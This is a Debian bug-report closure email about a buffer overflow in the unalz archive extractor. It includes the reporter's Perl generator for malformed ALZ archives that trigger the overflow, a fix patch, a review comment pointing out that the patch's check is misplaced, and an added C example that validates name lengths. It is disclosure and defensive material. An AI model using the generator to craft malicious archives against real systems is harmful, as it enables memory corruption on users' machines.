Your message dated Wed, 15 Mar 2006 00:37:19 -0800
with message-id <[EMAIL PROTECTED]>
and subject line unalz: buffer overflow when extracting archives
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message ---
Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid
Hello,
I have found a buffer overflow security vulnerability in unalz. It
occurs when it extracts malicious ALZ archives.
I have attached the archives oflow333.alz (for sarge) and oflow1621.alz
(for testing and unstable), as well as the program alzgen.pl that
generated them and a patch that corrects this issue.
It is also possible to upgrade to the latest upstream version 0.53,
which also corrects it.
// Ulf Härnhammar, Debian Security Audit Project
-- System Information:
Debian Release: testing/unstable
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Versions of packages unalz depends on:
ii libc6 2.3.5-8 GNU C Library: Shared libraries an
ii libgcc1 1:4.0.2-2 GCC support library
ii libstdc++6 4.0.2-2 The GNU Standard C++ Library v3
unalz recommends no packages.
-- no debconf information
oflow333.alz
Description: Binary data
oflow1621.alz
Description: Binary data
#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
use strict;
use warnings;

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
my $len   = shift;
my $lenhi = int($len / 256);            # high byte of the 16-bit little-endian length
my $lenlo = $len - ($lenhi * 256);      # low byte
my $file  = shift;
open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" .          # SIG_LOCAL_FILE_HEADER ("BLZ\x01")
          chr($lenlo) . chr($lenhi) .   # filename length, little-endian
          "\x00" x 7 .                  # remaining header fields, zeroed
          'U' x $len;                   # the file name itself, $len bytes long
close OUT or die "can't close file!?!?\n";
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
return FALSE;
}
FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+ if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+ zipHeader.head.fileNameLength = MAX_PATH - 5;
zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
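Review bot: the new bound check is placed after `FRead(zipHeader.fileName, zipHeader.head.fileNameLength);`, so the read into zipHeader.fileName has already been done with the unclamped length by the time `if(zipHeader.head.fileNameLength > MAX_PATH - 5)` runs; only the terminator store on the following line is protected. Move the check above the FRead call, and prefer the `return FALSE;` path visible at the top of the hunk over silently clamping to MAX_PATH - 5, since truncation makes the extractor write to a name the archive did not declare. `MAX_PATH - 5` also deserves a comment explaining the 5.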
--- End Message ---
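As an added illustration, not unalz's own code and not part of the original report, the C parser below reads the same ALZ local file header layout that alzgen.pl writes (4-byte signature, 2-byte little-endian name length, 7 further header bytes, then the name) and validates the claimed length against the destination buffer before copying a single byte; the buffer size ALZ_MAX_PATH and the 13-byte header length are assumptions of this example, and alz_try_name_length feeds it constructed inputs with the same name lengths as the attached archives.

```c
#include <stdint.h>
#include <string.h>

/* Illustrative sizes (assumed for this example, not unalz's own definitions). */
#define ALZ_MAX_PATH   260
#define ALZ_HEADER_LEN 13  /* 4-byte signature + 2-byte name length + 7 bytes */

static const uint8_t ALZ_SIG[4] = { 0x42, 0x4c, 0x5a, 0x01 };  /* "BLZ\x01", as in alzgen.pl */

typedef struct { uint16_t fileNameLength; char fileName[ALZ_MAX_PATH]; } AlzLocalFileHeader;

/* Parse a local file header from an in-memory archive image.
 * Returns 0 on success, -1 if the header is malformed or the name would not fit.
 * The length is validated BEFORE any bytes are copied into fileName, and an
 * oversized name is rejected rather than silently truncated. */
int alz_read_local_header(const uint8_t *buf, size_t len, AlzLocalFileHeader *hdr)
{
    if (len < ALZ_HEADER_LEN || memcmp(buf, ALZ_SIG, 4) != 0) return -1;
    uint16_t nameLen = (uint16_t)(buf[4] | (buf[5] << 8));  /* little-endian */
    if (nameLen >= sizeof hdr->fileName) return -1;          /* no room for the NUL */
    if (len - ALZ_HEADER_LEN < nameLen) return -1;            /* truncated archive */
    hdr->fileNameLength = nameLen;
    memcpy(hdr->fileName, buf + ALZ_HEADER_LEN, nameLen);
    hdr->fileName[nameLen] = '\0';
    return 0;
}

/* Write the same header layout alzgen.pl produces (an all-'U' name of nameLen bytes).
 * Constructed test input only. Returns bytes written, or 0 if it does not fit in cap. */
size_t alz_make_header(uint8_t *out, size_t cap, unsigned nameLen)
{
    if (nameLen > 0xffff || cap < ALZ_HEADER_LEN + nameLen) return 0;
    memcpy(out, ALZ_SIG, 4);
    out[4] = (uint8_t)(nameLen & 0xff);
    out[5] = (uint8_t)(nameLen >> 8);
    memset(out + 6, 0, 7);
    memset(out + ALZ_HEADER_LEN, 'U', nameLen);
    return ALZ_HEADER_LEN + nameLen;
}

/* Generate and parse an archive whose name is nameLen bytes; returns the parser's result
 * (0 accepted, -1 rejected, -2 if the constructed image would not fit the scratch buffer). */
int alz_try_name_length(unsigned nameLen)
{
    static uint8_t img[4096];
    AlzLocalFileHeader hdr;
    size_t n = alz_make_header(img, sizeof img, nameLen);
    return n ? alz_read_local_header(img, n, &hdr) : -2;
}
```

Name lengths 333 and 1621 (the two attached archives) are rejected before any copy, while anything that fits with its terminator is accepted.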
--- Begin Message ---
Version: 0.30.1
This bug was fixed in a security upload to stable; marking as closed in that
version.
The changelog entry for this upload was:
unalz (0.30.1) stable-security; urgency=high
.
* Non-maintainer upload by the Security Team
* Fix buffer overflow in file name handling, discovered by Ulf Härnhammar
(CVE-2005-3862)
The bug appears to still apply to the version of the package in unstable,
and is marked as such.
--
Steve Langasek
Debian Developer
[EMAIL PROTECTED] http://www.debian.org/

"Give me a lever long enough and a Free OS to set it on, and I can move the world."
signature.asc
Description: Digital signature
--- End Message ---